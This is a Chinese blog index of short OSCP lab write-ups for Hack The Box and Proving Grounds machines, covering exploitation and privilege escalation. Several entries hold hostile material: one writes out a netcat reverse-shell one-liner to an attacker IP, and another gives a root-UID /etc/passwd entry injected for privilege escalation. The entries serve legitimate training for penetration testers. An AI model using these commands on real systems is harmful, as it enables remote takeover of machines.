- 博客(68)
- 收藏
- 关注
RSS订阅原创 OSCP - Hack The Box - Sau
简单研究了一下,这个CVE是 允许通过request-baskets来把请求转发到某处,这里考虑把请求转发到服务端的80端口(这里的127.0.01实际上会出现在requests-basket entry的配置里,也就是会指向服务器自身)执行sudo -l会发现线索 /usr/bin/systemctl。下载后执行如下命令,则会创建reverse shell。后会得到Maltrail v0.53的页面。打开页面后,在左下角找到了软件信息和版本。搜索相关信息会得到很多exp,这里使用了。
2025-05-12 16:37:43
342
原创 OSCP - Proving Grounds - EvilBox-One
robots.txt中的内容是`Hello H4x0r`,没有发现有什么用处,线索也不太多,所以强行爆破/secret/路径寻找php文件,发现了evil.php。通过先后包含 /etc/passwd和/home/mowree/.ssh/id_rsa文件获取到key文件用于登录,这里需要注意,如果是在浏览器中打开。登录后尝试了SUID,sudo -l都没有什么信息,但是在上传了linpeas.sh并运行后发现了 /etc/passwd对于所有用户都有读写权限。
2025-05-10 19:38:26
485
原创 OSCP - Proving Grounds - Pwned1
其中 /robots.txt就是包含了其他两个路径,并且其中/hidden_text比较有用,里面包含了一个名为secret.dic的字典文件,咱们可以利用它来爆破一下路径,并发现了一个路径。利用这一组用户名密码可以成功登录ftp服务,并且可以下载一个id_rsa的key文件,和一个note.txt文件,其中包含了一个人名。依旧先Nmap收集一下信息,21,22,80端口开放,尝试了一下ftp匿名登录,失败,于是专注于80端口。看起来是个登录页面,尝试了一下弱密码,无果,查看了一下源码发现了一些代码。
2025-05-09 15:22:32
194
原创 OSCP - Proving Grounds - Sumo
于是我们执行一下nikto,发现了应该是由shellshock漏洞,于是搜索一下。执行nmap扫描,比较直观,22和80端口开放,但是80端口没有什么内容。反弹shell会被创建,在当前目录下也可以直接获取到第一个flag。上传Linpeas.sh后并执行,发现了有dirtycow漏洞,在本地启动了nc -nlvp 80后 执行exp脚本。在本地编译后并上传运行后成功得到root权限。在尝试了几个exp之后, 找到了一个好用的。找一个比较靠谱的,我选择了dirty.c。
2025-05-07 21:29:50
204
原创 OSCP - Proving Grounds - NoName
稍微尝试了一下,发现可能有一些保护或者限制,所以我们采用另一种办法,利用base64编码/解码的方式绕过(ncat是我下载的一个已经编译好的文件,便于在nc没有安装的情况下创建reverse shell)经过试验,haclabs.jpeg包含隐写过的内容,密码是harder,而内容是经过base64编码的superadmin.php,所以我们尝试访问一下。查看一下页面源码,在底端发现了一个passphrase,也许是隐写过的图片的密码,于是我们把图片都下载下来。发现了admin目录。打开就发现了很多图片。
2025-05-06 23:45:09
372
原创 OSCP - Proving Grounds - Wpwn
便可获得reverse shell,也可以在/var/www路径下获取到第一个flag。发现了robots.txt和wordpress路径,但是robots.txt毫无价值。执行wpsan,在结果中发现了有漏洞的插件social-warfare。本地启动server和nc -nlvp 443后,访问。发现了一个比较有用的数据库配置文件,其中包含一个密码。在本地目录下创建payload.txt,内容为。经过尝试,我们可以得知改密码属于takis用户。并且该用户可以无需密码执行sudo。比较直接,22和80。
2025-04-28 08:55:43
328
原创 OSCP - Proving Grounds - Gaara
ssh登录remote server后,查找一下SUID权限的文件,发现了 gdb和gimp-2.10,参考GTFObins的提示,顺利提权,(不过gimp-2.10我这里报错了 :Cannot open display)但是无论执行路径爆破或者nikto 都没有任何有价值的收获,只能把注意力放在ssh爆破上了,这里有个很显著的用户名 gaara。nmap来查看一下开放哪些端口和服务,比较直接,只有22和80。使用hydra爆破一下,成功得到了密码iloveyou2。
2025-04-26 09:24:37
175
原创 OSCP - Proving Grounds - My-CMSMS
现在把目光转移到3306端口,尝试了一下弱密码,root/root 成功登录,既然是root用户,我们就可以重置CMS用户的密码,这里参考了官方文档,修改密码后登录成功。这里我们修改kali自带的 php reverse shell文件,更改ip/端口后 后缀改为phtml,上传, 在新窗口打开该文件后,反弹shell创建成功。其中80端口安装了一个CMS系统,左下角显示版本信息,查询了一下,有文件上传+RCE漏洞,不过需要用户名密码。
2025-04-23 06:35:51
351
原创 OSCP - Proving Grounds - Sar
但是,貌似80端口没有安装任何服务,是一个apche2的默认页面,不过我们这里dirb一下,发现了robots.txt,而robots.txt里包含了一个sar2HTML的路径。下载后执行,得到一个远程代码执行的console,但是还是不够,这里根据以往的经验,直接上传一个编译好的ncat,会快很多, 也可以尝试别的方法创建反弹shell。上传linpeas.sh并运行,则会发现,/var/www/html/finally.sh会每5分钟被sudo执行一次。所以我们可以直接劫持write.sh来提权。
2025-04-20 15:34:33
212
原创 OSCP - Proving Grounds - DriftingBlues6
后可以尝试多看一看,发现可以文件上传,在我们上传了一个文件之后,可以在刚才是空的 ../textpattern/files目录下看到,这时我们试一下上传一个 php reverse shell 并访问192.168.192.219/textpattern/files/php-reverse-shell.php 后,发现可以创建反弹shell。robots.txt里给出了一些信息 /textpattern/textpattern应该有东西,而.zip后缀可以重点关注。这里我先后尝试,也是我经常用的几个。
2025-04-17 07:40:36
431
原创 OSCP - Proving Grounds -FunboxEasy
这里随意选了一本书作为实验对象,尝试上传修改过的php reverse shell文件,没有报错,如果发现sql语句报错的情况,可以直接把 Author Title Publisher都改成Test,避免特殊字符过滤的问题。我首先试验的是admin,有sql注入漏洞,但是admin身份登录进去以后我没发现太多有价值的线索,之后把注意力转移到了store页面,利用了弱密码admin/admin登录成功。首先是nmap扫描一下,虽然只有22,80和3306端口,但是事情没那么简单。
2025-04-14 17:28:26
233
原创 OSCP - HTB - BoardLight
在linpeas.sh的结果中发现了更多的关于enlightenment的信息,存在CVE-2022-37706漏洞,exp为。搜索Dolibarr 17.0.0相关的信息,发现了 默认密码为admin/admin,而RCE 的poc为。UDP端口是filter掉的,而TCP端口也只是22,和80,比较直观。在80端口开放的页面最下方发现了一个host, board.htb。这时先搜索一下80端口的目录,在conf.php中发现了一个密码。这时查看一下home目录,发现了larissa用户。
2025-04-06 14:30:21
301
原创 OSCP - Proving Grounds- SoSimple
继续以steven的用户身份进行sudo -l,发现可以以root用户身份执行/opt/tools/server-health.sh。但其实并无该文件,所以我们尝试创建一个,其内容为赋予/bin/bash SUID,再以Root身份执行,提权成功。按照同样的套路,我们发现了/home/max目录中的.ssh路径下有key文件,所以复制下来尝试ssh登录。于是我们使用wpscan进行扫描,我这边挂了代理,并且我希望使用更有侵略性的插件扫描,所以命令如下。
2025-04-05 13:19:58
372
原创 OSCP - Proving Grounds - Zipper
按照这个尝试,打开burpsuite,访问如下内容,其中cmd是rm /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.226 80>/tmp/f的URL编码后的结果。这台机器还是很有难度的,我也是借鉴了一些别人的walkthrough才打下来,毕竟我对php实在没有研究,万没想到这东西还能LFI,学到了。既然是cron job,那么我们可以使用pspy64来看一下,有两个输出,第一个是*****,第二行则是明文密码。
2025-03-27 07:53:42
779
原创 OSCP - Proving Grounds- XposedAPI
于是复制remote server上的 /etc/passwd文件,在本地利用 openssl passwd -1 -salt 'tim' '1234' 生成密码后在passwd文件中追加一条记录tim:$1$tim$flzK.XIfIc3zTStgJZBye1:0:0:root:/root:/bin/bash。,可以实现LFI的目的,同时也发现了用户clumsyadmin,也许可以用在update api里。访问并试验一下,这些API应该都可以访问,有的成功有的报错,需要继续调查。
2025-03-23 07:37:50
238
原创 OSCP - Proving Grounds- CVE-2023-46818
于是先上传一个编译好的ncat,赋予执行权限后,本地启动nc -nlvp 80,而在remote 端的reverse shell中执行如下命令,新的reverse shell创建成功。同时查看相关的vulnerability,首先发现下面的exp,不过好像不是很好用,但给出了一个线索 ,该exp关联的就是CVE-2023-46818,和machine的名字一样。这个是好用的,可以得到reverse shell,不过这个限制比较多,咱们需要一个更好的reverse shell。
2025-03-19 15:22:40
291
原创 OSCP - HTB - Lame
执行find / -type f -perm -4000 2>/dev/null.发现了nmap具有SUID。nmap开路,经过查看ftp,和smb client都没有任何收获,只好把注意力放在3632上了。虽然文章给了poc,不过貌似不太好用,继续搜索 CVE-2004-2687相关poc,执行后得到reverse shell。按照描述,可以查询到确实有漏洞。
2025-03-16 10:13:22
174
原创 OSCP - Proving Grounds - Election
在../electin/admin/logs里发现了疑似用户名密码,不过用来登录UI是不行的,实际上是ssh的用户名和密码,虽然看来好像是WebUI的用户名密码。上传并执行Linpeas.sh,发现了内核漏洞,其他的并没有太多有价值的信息,这个漏洞并不是很常见,所以虽然它是less probable,但是也值得尝试一下。对于80端口进行枚举,发现了 ../election路径,进而发现了 ../election/admin ,../election/admin/logs路径。
2025-03-06 09:20:26
217
原创 OSCP - Proving Grounds - Fired
确实可以成功,但是尝试了各种reverse shell的方法,都不行,于是尝试找到一个ncat的portable版本。, 上传到remote server后成功创建reverse shell(记得chmod +x /tmp/ncat)这里比价抓狂,linpeas.sh和pspy64都毫无有价值线索,但是在Linpeas.sh的结果中发现了不起眼的。虽然不太喜欢这种手动挨个文件找的行为,不过在这个路径下找到了一个密码,尝试一下root用户吧,万一成功尼。尝试寻找各种信息,发现了3个有价值的文章。
2025-03-03 10:48:22
291
原创 OSCP - Proving Grounds - dev_working
执行一下backup,发现需要密码,所以先观察一下backup的代码,得到密码: B4cup32M4n4age,并且知道了backup在执行的时候会调用 ./lib_backup.so,所以思路就比较清晰了,劫持lib_back.so来提权。我虽然没能成功爆破,不过在google上发现了一个字典文件,里面有bob对应的密码hash,得到了bob的密码sunflower,可以成功登录ssh。nmap扫描,22,3306,8983端口开放,应该运行了ssh,mysql和未知应用。运行backup,提权成功。
2025-02-21 09:11:50
335
原创 OSCP - Proving Grounds - LaVita
修改php-reverse-shell.php的ip和端口并上传到remote端,重命名并覆盖/var/www/html/lavita/artisan,本地执行nc -nlvp 3306,等一会儿得到了第二个reverse shell。修改一下变成如下,如果第一个命令用skunk的反弹shell无法执行,可以考虑用www-data用户的反弹shell执行,并用skunk的反弹shell执行第二个命令。运行后发现该脚本比较全面,会尝试不同的RCE漏洞的exploit,有成功的,有失败的。
2025-02-19 14:55:46
988
原创 OSCP - Proving Grounds - Squid
访问UI界面,发现是系统用户,提权都不用了,其实这里可以直接用dir和type命令搭配直接拿到Local.txt和proof.txt的,不过我们还是尝试创建reverse shell。而phpmyadmin则是mysql/mariadb的web UI,尝试各种弱密码后,发现可以用root用户免密码登录mysql数据库,这是我没想到的。尝试在remote端寻找nc.exe或者ncat.exe,都没有安装,所以在本地启动Python服务器后,上传kali中的nc.exe到remote端。
2025-02-15 13:43:44
369
原创 OSCP - Other Machines - Loly
重新调用wpscan,加入字典进行密码爆破,成功,一个密码文件不行就多换几个试试,尽量不要用rockyou,太大了,山穷水尽的时候再考虑rockyou。我们尝试一下新建一个reverse文件夹并将php-reverse-shell.php复制并修改,最后打包成一个reverse.zip后上传,上传成功。用sudo -l和suid作为线索去试验,没有发现任何东西,但是在linpeas的结果中发现了,linux版本应该有漏洞,查询一下发现了。在settigns中发现了上传后文件的保存路径。
2025-02-10 22:32:33
520
原创 OSCP - Proving Grounds - DC-9
目前其实我们是卡住了,因为22端口是关闭的,不过我们可以尝试继续爆破remote server的系统文件, 至于为什么是response words是55, 因为如果没有任何文件被包含,response的words数量就是55,这样可以过滤掉很多数据,而字典文件比较重要,需要使用/usr/share/SecLists/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt。我们首先把这些数据保存成文件,名字为users用冒号分割,一会儿爆破用。
2025-02-06 09:52:14
873
原创 OSCP - Proving Grounds - sar2HTML
这个finally.sh比较可疑,查看一下,看起来这个finally.sh会调用write.sh,而我们对于write.sh有写权限。枚举一下路径,发现有phpinfo和robots.txt,而robots.txt里有sar2HTML路径。sudo -l和suid都没有什么有用的信息,上传Linpeas.sh并执行,得到。尝试访问一下sar2HTML,得知是3.2.1版本,搜索一下得知其有RCE漏洞。修改write.sh,让其赋予/bin/bash SUID。nmap扫描,只开了一个80端口。
2025-02-05 10:44:06
462
原创 OSCP -Proving Grounds - Blogger
在pspy64的结果中发现了 /usr/local/bin/backup.sh被root用户以cronjob的形式运行,并且它会利用tar命令备份/home/james/路径下的 local.txt,不过目前我们没有james的密码。利用得到的密码来转变成james来在/home/james路径下创建文件来实现提权,思路是利用创建checkpoint文件 来让tar命令执行的时候调用相关script。
2025-02-05 10:40:27
537
原创 OSCP - Proving Grounds - CuteNews
example.php和uploads看起来挺有意思,并且发现会去cute.calipendula 域名去下载文件,于是乎我们先把ip和host加入到/etc/host路径下,再看看。执行sudo -l,发现确实可以无需密码以root身份执行hping3,但是有限制,应该没法作为提权线索。这两个exp我都尝试了,第一个不是很好用,但是至少注册成功创建了用户名和密码。依旧先执行namp,很多端口开放,不过我们先以80端口作为潜在突破口试试。执行dirb一下,看看80端口有哪些有趣的路径。
2025-02-04 21:36:25
444
原创 OSCP - Proving Grounds - Roquefort
无法sudo,suid也没发现有用的信息,尝试上传Linpeas.sh发现该用户对于/usr/local/bin有写权限,所以也许可以覆盖linux path后面的命令来提权(linux寻找可执行文件是从path左到右的各个路径去找)再执行pspy64,发现run-parts会被定期执行,于是我们可以尝试覆盖run-parts。/bin/路径在path中的位置是在/usr/local/bin后面,所以成功提权。发现失败,于是创建一个用户试试,再创建一个新项目后尝试更改githook。
2025-02-03 10:15:49
258
原创 OSCP - Proving Grounds - Jordak
但是exp自带的命令行并不是一个真正的shell,于是我们需要建立一个reverse shell先,发现 jordak属于sudo组,并且可以不需要密码执行/usr/bin/env。发现80端口开放,但看不到任何内容,所以dirb一下,发现了很多路径开放,也有很多潜在的线索。搜索一下GTFObings,得到 /usr/bin/env可以使用如下方式提权。最终发现一个登录页面,是Jorani v1.0.0,搜索一下相应的vulnerability信息,发现了。按照其中描述的exp,在本地执行。
2025-02-01 09:47:15
468
原创 OSCP - Proving Grounds - Press
确实可以执行cmd,但是创建反弹shell的时候出现了挑战,各种方式都不行,但是查看一下whereis nc后,发现确实安装了nc,而且还是两个不同版本的nc,用不同的文件名区分。执行sudo -l后发现可以无需密码 sudo /usr/bin/apt-get,在本地执行nc -nlvp 8080后,调用如下Link,反弹shell创建成功。执行nmap,发现安装了flatPress 1.2.1。参考GTFOBins的建议。搜索一下相关信息,得到。按照步骤一步一步去复现。
2025-01-24 18:55:50
481
原创 OSCP - Proving Grounds - Quackerjack
需要修改一下exp,在发送request的时候加入 verify=False参数,否则会报自签名证书错误,不过还是会失败在下面这一步,不过至少创建出了admin用户,把exp最后的删除admin user的代码去掉,保留admin权限。继续寻找信息,发现 /usr/bin/find命令有 SUID权限,直接利用,得到root权限。看来同样具有admin+file upload漏洞,得到reverse shell。执行nmap扫描,开了好多端口,我先试验80和8081,看起来8081比较有趣。
2025-01-23 23:13:14
373
原创 OSCP - Proving Grounds - Air
发现了root运行了aria2c,但是目前咱们没有 rpc-secret,同时发现 6800端口库被占用,但是在nmap枚举中没有发现,于是我们可以考虑用端口转发将remote server端的6800转发到local server,我们一步一步来做。在remote server端执行如下curl命令,id_rsa.pub可以直接复用从deathflash用户的.ssh目录下辅助出来的(这里需要注意,如果本地在openvpn文件中配置了代理,要把代理注释掉重新连接VPN,否则无法下载)
2025-01-22 16:54:48
514
原创 OSCP - Proving Grounds - Image
在本地执行nc -nlvp 80后上传该payload,得到reverse shell。查找一下SUID相关信息,得到strace这个命令有点可疑。搜索一下,得知有CVE 2023-34152 RCE漏洞。发现开了80端口,访问后上传一个图片,得到版本信息。下载并执行后,得到了一个payload,在GTFObins上搜索到提权方式,首先依旧是nmap扫描,搜索相关exp,得到。
2025-01-21 14:54:04
328
原创 OSCP - Proving Grounds - BullyBox
尝试修改/etc/hosts,将ip与bullybox.local绑定,之后重新执行nmap扫描,得到了更多的信息,比如.git路径,以及robots.txt中的entries。先利用firefox得到Cookie中保存的phpsessionid,并在本地启用nc-nlvp之后调用如下命令,我是用Postman调用的,会生成下面的curl命令。执行cat/bb-config.php,发现疑似密码,结合已经发现的用户名admin@bullybox.local,登录成功。
2025-01-19 22:23:42
588
原创 OSCP - Proving Grounds - Snookums
仔细搜索发现 在0.7版本的该软件有RFI漏洞,根据EXP,先在本地创建php web shell,并修改ip/端口,运行nc -nlvp 80后,访问如下link。修改/etc/passwd,执行su tim,密码为1234,得到root权限。上传并运行linpeas.sh,发现居然对于/etc/passwd有写权限。执行nmap,没有太多有用的信息,其实也只有一个80端口值得访问一下。利用openssl生成密码后创建/etc/passwd entry。执行cat /etc/passwd可以发现。
2025-01-06 10:35:00
336
原创 OSCP - Proving Grounds - Pelican
尝试去寻找和Password相关的进程,没太多发现, 启动一下/usr/bin/password-store后再dum其进程信息。,在本地启动nc -nlvp 80后,按下图修改,得到reverse shell和第一个flag。查看一下/usr/bin/gcore的脚本,看起来是可以dump进程数据的,构建python full pty后su root,得到root权限。继续调查SUID和SUDO -l,分别得到。花了时间挨个搜索了一下,最终发现。
2025-01-04 21:45:48
377
原创 OSCP - Proving Grounds - Slort
启动了nc -nlvp 80,和python -m http.server命令后,访问如下link,reverse shell创建成功,这时可以。,按照说明编译出reverse.exe并以同样方式上传到remote server后,覆盖C:\Backup\TFTP.EXE。但是4443和8080端口都有web应用开放,尝试dirb一下,结果很类似,都有site路径开放。尝试一下,确实可以包含本地文件,接下来尝试远程文件包含去执行reverse shell。windows的reveseshell。
2024-12-26 14:54:53
376
原创 OSCP - Proving Grounds - Algernon
虽然不知道版本,不过搜索一下可以得到一些exploit,阅读一下,发现利用了17001端口,恰好remote server端也开放了17001,尝试修改exp并运行,得到reverse shell。用户直接就是administrator,所以不用提权。执行nmap扫描,很多端口开放,一个一个检查一下。9888端口开放了一个smartermail服务。
2024-12-25 16:37:45
262
原创 OSCP - Proving Grounds - Plum
上传linpeas.sh并运行,发现有疑似邮件(这里走了很多弯路,被savelog这个伪线索迷惑了,研究了半天,结果root密码在邮件里)保存并在本地运行nc -nlvp 80后,点View page Satic 1 on site,reverse shell会被创建。按照其中给的步骤一步一步试验,试验出了弱密码 admin/admin组合,成功登录后,按如下修改。访问80端口,发现安装了PluXml,具体版本不清楚。,搜索一下相关软件的vulnerability。执行su root,得到root权限。
2024-12-17 23:46:30
314
原创 OSCP - Proving Grounds - Sorcerer
于是咱们可以更改authorized_keys文件,删除ssh-rsa字样前的限制条件并利用scp命令覆 remote server中的 同名文件,这里需要使用-O 参数,否则会报错: Received message too long 1094927173。查看../max/.ssh/authorized_keys的内容,发现在登录的时候会调用scp_wrapper.sh,也就是如果利用ssh命令登录,则会失败,只允许scp命令。下载下来后得到4个文件,解压缩后发现是/home 路径的备份。
2024-12-16 09:08:46
339
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人